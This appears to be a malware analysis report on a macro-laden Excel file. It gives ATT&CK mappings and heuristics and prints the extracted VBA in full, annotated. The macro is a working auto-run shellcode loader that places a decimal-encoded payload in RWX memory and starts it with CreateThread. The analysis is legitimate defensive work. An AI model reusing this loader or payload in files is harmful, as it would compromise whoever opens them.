MALICIOUS
108
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The Workbook_Open macro indicates that the malicious code executes automatically when the Excel file is opened. The VBA script uses VirtualAlloc and WriteProcessMemory APIs to allocate memory and write shellcode, which is then executed via CreateThread. This pattern suggests the file is designed to download and execute a secondary payload.
Heuristics 4
-
Reference to WriteProcessMemory API — critical — SC_STR_WRITEPROCESSMEMORY: Reference to WriteProcessMemory API
-
Reference to VirtualAlloc API — medium — SC_STR_VIRTUALALLOC: Reference to VirtualAlloc API
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
Workbook_Open macro — low — OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5357 bytes |
| SHA-256: 5be0ec23aa6a80a1316577461de68386507487e0f52adc691c9ab9bf2d7aee07 | | | |
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Win32 imports used by the loader below. All three come from KERNEL32 and are
' declared with 32-bit Long handles/pointers and without PtrSafe, so this module
' is not expected to compile under 64-bit Office, where Declare requires PtrSafe.
Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal lpBuffer As String, ByVal dwSize As Long, ByRef lpNumberOfBytesWritten As Long) As Integer
Private Declare Function CreateThread Lib "KERNEL32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, ByRef lpThreadId As Long) As Long
' Allocation flags passed to VirtualAlloc in ExecuteShellCode: commit the pages
' as read/write/execute. An RWX commit followed by a thread started at the same
' address is the behaviour the heuristics above key on.
Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40
' Loader entry point: builds the payload string, places it in RWX memory inside
' the current process and starts a thread at its first byte. This is the
' in-process shellcode-execution pattern that earned the critical/medium
' heuristic matches above. None of the three API return values is checked.
Private Sub ExecuteShellCode()
Dim lpMemory As Long      ' base address returned by VirtualAlloc (0 on failure)
Dim sShellCode As String  ' decoded payload, one character per byte
Dim lResult As Long       ' assigned twice, never inspected
sShellCode = ShellCode()
' One allocation that is writable and executable at the same time.
lpMemory = VirtualAlloc(0&, Len(sShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
' -1& is the current-process pseudo-handle, so the copy goes into Excel's own
' address space, not a remote process. The String is passed ByVal; VBA
' presumably marshals it as an ANSI byte buffer here — confirm when detonating.
lResult = WriteProcessMemory(-1&, lpMemory, sShellCode, Len(sShellCode), 0&)
' Thread start address is the freshly written buffer: control transfers to the
' payload. For triage, the decoded bytes live in ShellCode1 / ParseBytes.
lResult = CreateThread(0&, 0&, lpMemory, 0&, 0&, 0&)
End Sub
' Decodes a space-separated list of decimal byte values (e.g. "184 230 17")
' into a String with one character per value. The payload in ShellCode1 is
' stored as this kind of readable decimal text rather than as binary, so an
' analyst can recover the raw bytes by applying the same split-and-convert step
' offline without running the macro.
Private Function ParseBytes(strBytes) As String
Dim aNumbers            ' Variant array produced by Split
Dim sShellCode As String
Dim iIter
sShellCode = ""
aNumbers = Split(strBytes)   ' default delimiter: a single space
For iIter = LBound(aNumbers) To UBound(aNumbers)
' Chr() on 128-255 maps through the ANSI code page; the loader evidently
' relies on that being a 1:1 mapping when the String is later passed to
' WriteProcessMemory — the exact bytes written should be confirmed in a sandbox.
sShellCode = sShellCode + Chr(aNumbers(iIter))
Next
ParseBytes = sShellCode
End Function
Private Function ShellCode1() As String
Dim sShellCode As String
sShellCode = ""
sShellCode = sShellCode + ParseBytes("184 230 17 158 154 218 208 217 116 36 244 93 49 201 177 99 131 237 252 49 69 17 3")
sShellCode = sShellCode + ParseBytes("69 17 226 19 202 66 32 213 34 62 158 48 200 155 212 156 24 45 165 125 106 251 209")
sShellCode = sShellCode + ParseBytes("126 218 20 93 72 41 188 95 65 187 62 42 196 173 152 74 250 0 162 160 29 135 89 246")
sShellCode = sShellCode + ParseBytes("15 198 151 196 223 189 82 119 57 35 32 169 229 12 231 80 212 84 223 61 218 66 6 139")
sShellCode = sShellCode + ParseBytes("32 209 100 177 50 242 220 226 92 153 176 40 148 82 71 36 164 219 240 53 120 223 59")
sShellCode = sShellCode + ParseBytes("29 16 249 221 197 221 157 119 119 121 100 125 143 123 188 167 87 19 201 78 170 254")
sShellCode = sShellCode + ParseBytes("186 147 192 239 98 96 249 161 41 98 116 108 9 140 222 251 65 5 203 62 108 70 44 104")
sShellCode = sShellCode + ParseBytes("75 115 36 83 4 77 109 150 236 26 83 166 101 248 150 75 132 108 115 45 226 255 171")
sShellCode = sShellCode + ParseBytes("139 191 173 105 255 40 182 58 48 32 117 32 117 253 183 23 164 24 198 78 135 177 79")
sShellCode = sShellCode + ParseBytes("80 10 41 232 154 166 79 99 252 253 46 130 214 129 24 166 17 13 202 41 175 249 123")
sShellCode = sShellCode + ParseBytes("187 169 39 234 146 194 219 140 128 49 21 138 128 252 162 210 28 76 209 150 213 174")
sShellCode = sShellCode + ParseBytes("196 34 158 102 130 195 112 17 226 28 90 133 102 137 130 33 201 114 140 231 162 31")
sShellCode = sShellCode + ParseBytes("78 240 54 59 139 32 83 45 219 187 166 239 108 117 195 243 129 42 197 230 205 36 158")
sShellCode = sShellCode + ParseBytes("253 212 4 157 152 159 153 107 67 122 232 95 217 97 245 194 225 52 98 223 112 103 227")
sShellCode = sShellCode + ParseBytes("127 142 9 215 67 174 238 234 208 11 103 20 201 146 61 230 250 83 87 195 32 39 223")
sShellCode = sShellCode + ParseBytes("146 104 42 73 47 152 127 71 157 247 19 32 216 112 115 105 184 139 13 168 57 12 11")
sShellCode = sShellCode + ParseBytes("243 10 199 16 153 203 94 231 16 198 214 155 125 171 157 176 214 181 212 201 226 186")
sShellCode = sShellCode + ParseBytes("11 125 89 198 25 131 109 9 133 211 157 250 6 78 13 140 111 92 2 219 168 18 59 80 227")
sShellCode = sShellCode + ParseBytes("47 213 195 156 172 110 149")
ShellCode1 = sShellCode
End Function
' Assembles the full payload by concatenating the chunk functions. Only
' ShellCode1 exists in this sample, so this is a pass-through; the
' ShellCode()/ShellCodeN() split suggests a generator that can emit several
' chunks, so when triaging similar samples collect every chunk function before
' reconstructing the bytes.
Private Function ShellCode() As String
Dim sShellCode As String
sShellCode = ""
sShellCode = sShellCode + ShellCode1()
ShellCode = sShellCode
End Function
' Auto-run entry point: Excel fires Workbook_Open when the document is opened
' with macros enabled (T1204.002 -> T1059.005 above), so the loader needs no
' further user action. This is the line matched by OLE_VBA_WBOPEN. Office's
' default blocking of macros in files carrying the Mark-of-the-Web, and the
' ASR rule "Block Win32 API calls from Office macros", both interrupt this path.
Sub Workbook_Open()
ExecuteShellCode
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True